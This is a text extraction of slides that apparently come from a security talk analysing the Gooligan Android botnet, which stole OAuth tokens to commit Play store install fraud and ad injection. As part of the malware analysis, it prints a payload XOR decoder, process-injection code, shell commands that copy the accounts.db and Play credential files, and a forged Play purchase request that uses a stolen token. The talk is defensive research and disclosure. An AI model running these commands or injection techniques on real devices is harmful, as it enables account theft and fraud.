& 1st large scale oauth stealing botnet & Secure - - PowerPoint PPT Presentation

1st large scale oauth stealing botnet
SMART_READER_LITE
LIVE PREVIEW

& 1st large scale oauth stealing botnet & Secure - - PowerPoint PPT Presentation

Aug 01, 2023 166 likes •719 views

& 1st large scale oauth stealing botnet & Secure delegation mechanism De-facto authentication standard & & Exploit server Play store fake install/comments Ads injection Repacked (non-google) app Registration

slide-1
SLIDE 1

&

slide-2
SLIDE 2

&

1st large scale oauth stealing botnet

slide-3
SLIDE 3

&

Secure delegation mechanism De-facto authentication standard

slide-4
SLIDE 4

&

slide-5
SLIDE 5

&

Exploit server Registration server Fraudulent app & ads promotion C&C Ads injection (non-google) Play store fake install/comments Repacked app

slide-6
SLIDE 6

Remediation Affected devices Infection Discovery Monetization schema

slide-7
SLIDE 7
slide-8
SLIDE 8

&

Payload decoding Exploit downloading Persistence setup Play store injection Phone rooting

Classic ghost push Gooligan

slide-9
SLIDE 9

&

Payload hidden in fake image

/assets/close.png

Use a hardcoded XOR function

slide-10
SLIDE 10

&

Val 1 XOR Key Val 2 Val 2 Val 1 Header (10 bytes) XOR Key (10 bytes) Footer (10 bytes) Stage 2 payload Payload

slide-11
SLIDE 11

& with open(argv[1], 'rb') as f: png = f.read() key = itertools.cycle(png[10:20]) decrypted = [chr(ord(k) ^ ord(d)) for k, d in itertools.izip(key, png[20:-10])] with open(argv[2], 'wb') as output:

  • utput.write(‘’.join(decrypted))

XOR key of length 10 - hard-coded into the payload

slide-12
SLIDE 12

&

Kingroot exploit pack Target Android 3.x and 4.x

slide-13
SLIDE 13

&

Add utilities in system partition Backdoor recovery

slide-14
SLIDE 14

&

1. Inject shared object in Play store app

  • 3. Used to load malicious DEX files
  • 2. Listen to multiple events to wake-up
slide-15
SLIDE 15

& int main(int argc, char** argv) { pid_t target_pid; target_pid = find_pid_of("/system/bin/surfaceflinger"); if (-1 == target_pid) { printf("Can't find the process\n"); return -1; } //target_pid = find_pid_of("/data/test"); inject_remote_process(target_pid, "/data/libhello.so", "hook_entry", "I'm parameter!", strlen("I'm parameter!")); return 0; }

https://github.com/jekinleeph/LibInjectAll/blob/master/inject.c

Injected process pid: Play app Library to inject: igpld.so

slide-16
SLIDE 16
slide-17
SLIDE 17

&

the string oversea_adjust_read_redis was buried in patient zero sample

slide-18
SLIDE 18

& http://www.cnblogs.com/beautiful-code/p/5750382.html

slide-19
SLIDE 19

&

slide-20
SLIDE 20

&

slide-21
SLIDE 21

&

slide-22
SLIDE 22

&

52.220.249.y 139.162.2.x

slide-23
SLIDE 23
slide-24
SLIDE 24

&

slide-25
SLIDE 25

&

app boosting

slide-26
SLIDE 26

&

Oauth token solely used to interact with the Play store Full boosting package

slide-27
SLIDE 27

&

Server based fraudulent installs are mostly ineffective

?

Attempt to masquerade as a real device

slide-28
SLIDE 28

&

Accounts.db access Oauth token exchange Play store apk injection Play store download & review Gooligan C&C sync

slide-29
SLIDE 29

& cat /data/system/users/0/accounts.db > `pwd`/.agp.d cat /data/data/com.google.android.gms/shared_prefs/Checkin.xml > `pwd`/.agp.e cat /data/data/com.android.vending/shared_prefs/finsky.xml > `pwd`/.agp.f

slide-30
SLIDE 30

&

Perform SQLite queries to find tokens Look for specific tokens

slide-31
SLIDE 31

&

Accounts.db access Oauth token exchange Play store apk injection Play store download & review Gooligan C&C sync

slide-32
SLIDE 32

&

Malware reports phone information Server provides fraud info

slide-33
SLIDE 33

&

Exfiltrated data was used to mimic realistic phone in fraudulent requests Data used on non-rooted phones

?

slide-34
SLIDE 34

&

Accounts.db access Oauth token exchange Play store apk injection Play store download & review Gooligan C&C sync

slide-35
SLIDE 35

&

Get a refreshed oauth token Solely used for play

slide-36
SLIDE 36

&

Accounts.db access Oauth token exchange Play store apk injection Play store download & review Gooligan C&C sync

slide-37
SLIDE 37

&

Try to mimic a real install May leave a review

slide-38
SLIDE 38

& public static AndroidAppDeliveryData purchase(Detail detail, AndroidInfo info) { <snip> header.put("X-DFE-Device-Id", DeviceUtil.deviceId); header.put("Authorization", "GoogleLogin auth=" + info.token); header.put("X-Public-Android-Id", DeviceUtil.androidId); header.put("X-DFE-Signature-Request", DeviceUtil.getOnceSign()); </snip> NanoProtoHelper.getParsedResponseFromWrapper(ResponseWrapper.parseFrom(Utils.readBytes(n ew GZIPInputStream(Http.post("https://android.clients.google.com/fdfe/purchase", json.getBytes(), header, Http.FORM)))).payload, }

found in com.android.vending.HttpRequest

slide-39
SLIDE 39

&

Play anti-abuse defenses removed 100%

  • f the fake installs & comments

Abusive apps and developers were suspended

slide-40
SLIDE 40

&

Ads injection

slide-41
SLIDE 41

&

Ads injection

Ads popup for “real” apps Attribution washing

slide-42
SLIDE 42

&

35M

slide-43
SLIDE 43
slide-44
SLIDE 44

&

manufacturers

slide-45
SLIDE 45

&

Android version

slide-46
SLIDE 46

&

geo-distribution

19% infections from India 80% from emerging countries

slide-47
SLIDE 47
slide-48
SLIDE 48

&

Command and Control takedown Token revocation

slide-49
SLIDE 49

&

slide-50
SLIDE 50

&

Sinkholing analytics fixed

slide-51
SLIDE 51

&

slide-52
SLIDE 52

&

Oauth botnet as emerging threat Stronger together Extremely fast takedown

slide-53
SLIDE 53

&

slide-54
SLIDE 54

&

slide-55
SLIDE 55

&